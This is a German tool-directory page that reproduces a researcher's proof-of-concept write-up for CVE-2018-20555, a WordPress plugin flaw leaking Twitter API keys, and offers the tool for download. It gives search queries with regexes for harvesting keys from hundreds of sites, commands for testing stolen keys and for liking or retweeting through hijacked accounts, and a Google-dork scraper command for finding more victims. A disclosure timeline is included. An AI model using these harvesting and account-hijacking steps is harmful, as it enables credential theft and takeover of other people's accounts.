Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-20555 — Social Network Tabs Wordpress-Plugin-Sicherheitslücke - CVE-2018-20555 | Kitploit
Tools/GitHubGitHub/fs0c131y/cve-2018-20555
OSINT (Open-Source-Intelligence)SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungCrawler
GitHubfs0c131y/cve-2018-20555

CVE-2018-20555

Social Network Tabs Wordpress-Plugin-Sicherheitslücke - CVE-2018-20555

Repository anzeigen
7118vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2018-20555

Das WordPress-Plugin namens Social Network Tabs, entwickelt von der Firma Design Chemical, gibt zweimal den Twitter access_token, access_token_secret, consumer_key und consumer_secret seiner Benutzer preis, was zur Übernahme ihres Twitter-Kontos führt.

Dies wird durch die folgenden Codezeilen auf der Seite verursacht, auf der das Twitter-Widget angezeigt wird:

root@kitploit:~
jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"
		},
	}
});

Ausnutzung

Dank Publicwww konnte ich mit den folgenden Suchanfragen den Twitter access_token, access_token_secret, consumer_key und consumer_secret von 539 verwundbaren Websites abrufen:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

Alle Schlüssel sind in twitter_keys.csv verfügbar.

Anleitung

Testen der Twitter-API-Schlüssel in twitter_keys.csv

root@kitploit:~
python test_twitter_api_keys.py -t

Als ich diesen Befehl zum ersten Mal ausführte, erhielt ich die Informationen von 446 Twitter-Konten. Erwähnenswert ist, dass sich 2 verifizierte Konten in der Liste befanden und mehrere Konten mit mehr als 10K+ Followern. Alle verwundbaren Konten sind in vulnerable_accounts.txt.

Der lustige Teil

Liken Sie den Tweet Ihrer Wahl

root@kitploit:~
python test_twitter_api_keys.py -l [tweet_id]

Retweeten Sie den Tweet Ihrer Wahl

root@kitploit:~
python test_twitter_api_keys.py -r [tweet_id]

Als ich diesen Befehl zum ersten Mal ausführte, konnte ich den Tweet meiner Wahl 127 Mal liken, was zeigte, dass 127 Twitter-API-Schlüssel über Lese-/Schreibrechte verfügten, was bedeutete, dass ich aufgrund dieser Schlüssellecks 127 Twitter-Konten übernehmen konnte (Profilbild ändern, liken, retweeten, Bio ändern,...).

UPDATE 17/01/18

Eine Vielzahl von Websites und damit auch Twitter-Konten sind immer noch von diesem Problem betroffen. Um sie zu identifizieren, habe ich einen Scraper erstellt

root@kitploit:~
cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

Die Gesamtzahl der Ergebnisse für diese Google-Suchanfrage beträgt 3550. Unter den ersten 9 Seiten konnte ich 78 Schlüssel abrufen (86%). Viel Spaß!

Offenlegung

  • 01/12/18: Offenlegung an Twitter
  • 0X/12/18: Twitter hat alle Schlüssel deaktiviert
  • 11/12/18: Bestätigung als gültiges Sicherheitsproblem durch Twitter

Kontakt

Folge mir auf Twitter! Einen kleinen Teil meiner Arbeit findest du auch auf https://fs0c131y.com

Danksagungen

Die Untersuchung und der POC wurden mit ❤️ von @fs0c131y erstellt.

Tool herunterladen